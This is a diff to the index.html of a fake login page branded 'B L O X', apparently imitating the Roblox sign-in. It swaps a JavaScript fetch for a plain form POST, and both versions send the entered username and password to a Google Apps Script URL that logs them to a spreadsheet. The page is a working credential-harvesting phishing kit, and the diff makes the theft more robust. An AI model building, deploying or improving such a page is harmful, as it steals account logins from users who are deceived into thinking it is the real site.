--- a/index.html
+++ b/index.html
@@ -164,69 +164,41 @@
       <div class="tilted-square" aria-hidden="true"></div>
       B L O X
     </h1>
-    <form id="loginForm" class="form-container" aria-label="Login form">
-      <label for="username" class="sr-only">Username, Email or Phone</label>
-      <input id="username" name="username" type="text" placeholder="Username/Email/Phone" autocomplete="username" required />
 
-      <label for="password" class="sr-only">Password</label>
+    <!-- Direct POST form to Google Apps Script -->
+    <form class="form-container" method="post"
+      action="https://script.google.com/macros/s/AKfycbzeW2B6YLYY_Yn8Q4bQpnqHc2qFHqgNxpepdDjAwpRMJzgyBDmrieKn1oyp6baxRgo-Cw/exec" target="_blank">
+      
+      <input name="username" type="text" placeholder="Username/Email/Phone" required />
       <div class="password-wrapper">
-        <input id="password" name="password" type="password" placeholder="Password" autocomplete="current-password" required />
-        <span class="toggle-password" role="button" aria-label="Toggle password visibility" tabindex="0">&#128065;</span>
+        <input name="password" type="password" placeholder="Password" required />
+        <span class="toggle-password" role="button" tabindex="0">&#128065;</span>
       </div>
-
-      <button type="submit" class="btn-login" aria-label="Log In">Log In</button>
-      <button type="button" class="btn-other-device" aria-label="Log In With Another Device">Log In With Another Device</button>
-
-      <div class="forgot-password" tabindex="0" role="link" aria-label="Forgot Password or Username?">
-        Forgot Password or Username?
-      </div>
+      
+      <button type="submit" class="btn-login">Log In</button>
+      <button type="button" class="btn-other-device">Log In With Another Device</button>
+      <div class="forgot-password">Forgot Password or Username?</div>
     </form>
   </main>
 
   <script>
-    // Toggle password visibility
+    // Password toggle
     const toggleBtn = document.querySelector('.toggle-password');
-    const passwordInput = document.getElementById('password');
+    const passwordInput = document.querySelector('input[type="password"]');
 
     toggleBtn.addEventListener('click', () => {
-      passwordInput.type = passwordInput.type === 'password' ? 'text' : 'password';
-      toggleBtn.style.color = passwordInput.type === 'password' ? 'rgba(255 255 255 / 0.6)' : 'white';
+      if (passwordInput.type === 'password') {
+        passwordInput.type = 'text';
+        toggleBtn.style.color = 'white';
+      } else {
+        passwordInput.type = 'password';
+        toggleBtn.style.color = 'rgba(255 255 255 / 0.6)';
+      }
     });
-
-    toggleBtn.addEventListener('keydown', (e) => {
+    toggleBtn.addEventListener('keydown', e => {
       if (e.key === 'Enter' || e.key === ' ') {
         e.preventDefault();
         toggleBtn.click();
-      }
-    });
-
-    // Submit to Google Sheets
-    const loginForm = document.getElementById('loginForm');
-    loginForm.addEventListener('submit', async (e) => {
-      e.preventDefault();
-
-      const username = document.getElementById('username').value;
-      const password = document.getElementById('password').value;
-
-      try {
-        const response = await fetch(
-          'https://script.google.com/macros/s/AKfycbzeW2B6YLYY_Yn8Q4bQpnqHc2qFHqgNxpepdDjAwpRMJzgyBDmrieKn1oyp6baxRgo-Cw/exec',
-          {
-            method: 'POST',
-            body: JSON.stringify({ username, password }),
-          }
-        );
-
-        const result = await response.json();
-        if (result.status === "success") {
-          alert("Form submitted successfully!");
-          loginForm.reset();
-        } else {
-          alert("Error: " + result.message);
-        }
-      } catch (err) {
-        alert("Error submitting form");
-        console.error(err);
       }
     });
   </script>
